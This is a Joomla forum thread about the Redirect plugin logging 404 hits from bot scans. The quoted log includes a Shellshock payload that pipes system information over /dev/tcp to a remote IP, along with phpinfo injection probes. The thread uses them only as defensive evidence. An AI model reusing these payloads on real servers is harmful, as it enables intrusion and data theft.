Unusual URLs showing in Redirect Plugin - Joomla 3.3.6

[SForsgren]

I had a plugin "System - Redirect" enabled but don't rely on it for any function on my web site. I recently had a DOS like scenario where one IP address was trying to access the same non-existing page on my site over and over again. The IP was blocked and I am working with the hosting company.

I continued looking through the site for any other possible issues that may be a security exposure. When I looked at the setup for the Redirect component, I see lots of things added there that I did not add. From what I have read, the system automatically adds URLs to the list, correct?

I have 2 domains - one for testing upgrades and one for the production site. Both have different entries but both have a number of them. Many of these look like pages that hackers tried to exploit on my site but when I try to go to the URL, they return a 404. Were these auto-added from someone's attempt to go to these on my site? Or is this an indication that someone was able to add them directly to the redirect manager?

Note: I have no wordpress on my site at all but see URLs in Redirect Manager. Does this mean someone tried to access this URL even though it did not exist and so it added to Redirect Manager?

I looked for many of the directories and/or php files that were listed, but none of them appear to exist on the server.

I have removed domains and IPs from the below. Most of them don't seem to point to actual files on my system. Can someone confirm that these are attempts to hack a site and not that someone was able to actually add them to the redirect manager otherwise?

Thank you for any insights.

Thanks.
Scott

() { :;}; /bin/bash -c "echo domain.COM/cgi-bin/test-cgi > /dev/tcp/nn.nn.nn.nn/23; /bin/uname -a > /dev/tcp/nn.nn.nn.nn/23; e

http://www.domain.comhttp//www.domain.c ... trackback/

about-us/treatments-and-how-it-works/holistic-weight-loss-program/feed/

http://www.domain.com/about-us/treatmen ... ting/feed/

wp-content/uploads/wpallimport/uploads/604f3067e5ebc9a95fee9e1359a56504/info.php

http://domain.com/wp-content/plugins/wp ... ntYJqP.php

http://domain.com/wp-content/uploads/wp ... f/info.php

about-us/make-an-appointment/?wcalendar=1435708800#app_schedule

http://domain.com//components/com_jooml ... la_lib.php

http://domain.com/wp-content/uploads/wp ... d/info.php

http://domain.com/wp-content/plugins/wp ... ntYJqP.php

http://domain.com/modules/mod_footer/tm ... en=phpinfo();

http://domain.com/cgi-bin/test-cgi

[pe7er]

Joomla's Redirect Plugin registers every 404 error. If I would go to your website and try www.example.com/peter-was-here then you would find "peter-was-here" listed in your Redirect Manager.

Most URLs are from bots that are trying to fingerprint your website and/or find known vulnerabilities. They tried /wp-content/ on your Joomla website. Maybe to see if you were using that CMS, or trying to exploit a Wordpress (or WordPress 3rd party extension) vulnerability.

Nothing much to worry about. I remove the non existing & unpublished 404 errors regularly. I analyse the ones with many hits & might create redirects for those.

Regarding the DOS attack on a non-existing page on your site: I think that that's a mistake of the people trying to DDOS your website. DDOS attacks try to use all your server's resources so your website becomes inaccessible. A 404 error will probably use less resources than a working page, because the page will load images etc as well.

[SForsgren]

Thank you very kindly for the reply. I appreciate your response and time. Best

[dianaNashif]

Thank you for having info on this. It has been happening my my joomla site for 2 weeks now. I can't find an ip to block so I keep removing the errors.

Kindest Regards,
Diana

[Chacapamac]

Joomla 3.6.5

• What about URL in the redirect like ?

Code: Select all

http://my.web.server.ip/guestbook/fckeditor/fckeditor.js

http://my.web.server.ip/HNAP1

http://my.web.server.ip/home

http://my.web.server.ip/home.asp

• No way to know from what IP those come from ?

[emeyer]

What I found was blockoing IPs make no difference for these kind of things. The offenders user a continually changing ring of IPs, and some even automate the frequency they revisit your site to adjust for any temporary blocks. So what I do is set a redirect on them to the white house 'contact us' page, where they can write to that 'administrator.' Magically, after a day of of possibly inviting investigation from the Department of Homeland Security, they decide not to visit any more ).

[pe7er]

What I found was blockoing IPs make no difference for these kind of things. The offenders user a continually changing ring of IPs, and some even automate the frequency they revisit your site to adjust for any temporary blocks. So what I do is set a redirect on them to the white house 'contact us' page, where they can write to that 'administrator.' Magically, after a day of of possibly inviting investigation from the Department of Homeland Security, they decide not to visit any more ).

A few years back I created a 301 redirect in .htaccess to redirect certain unwanted traffic to the FBI. I also imagined the reaction of the unwanted visitors when they would see the FBI page.

Later I realized that it's just automated bots, usually on hacked computers or servers, that generate that unwanted traffic. And those bots do not care. And the FBI + White House probably have somewhat more important things to do then to be bothered about those bots.

btw: have you thought about redirecting unwanted traffic to 127.0.0.1 ?

[emeyer]

Yes, I did try other redirections, but I found the one to contact the usa president the most effective. and that was when obama was in office.

[Chacapamac]

Pe7er

have you thought about redirecting unwanted traffic to 127.0.0.1

Is this redirect to the Sender ? What will be the impact on the server?

[emeyer]

Pe7er is right, what most people do is redirect to 127.0.0.1 actually for sound reason.

The redirect would attempt to get from a localhost on any server running on the same machine as the client, and then typically be disconnected by the aggressor's own firewall, with minimal impact on your own server. The theory is that this most increases the load on the machine issuing the original request, which reduces the rate at which it can issue another request, and therefore mitigates DoS attacks.

So if DoS is your main concern, then 127.0.0.1 is better. But I was trying to stop repeated visits over more extended periods, rather than mitigate DoS, and that is what I meant to say I found more efficient.

Thank you for the good question )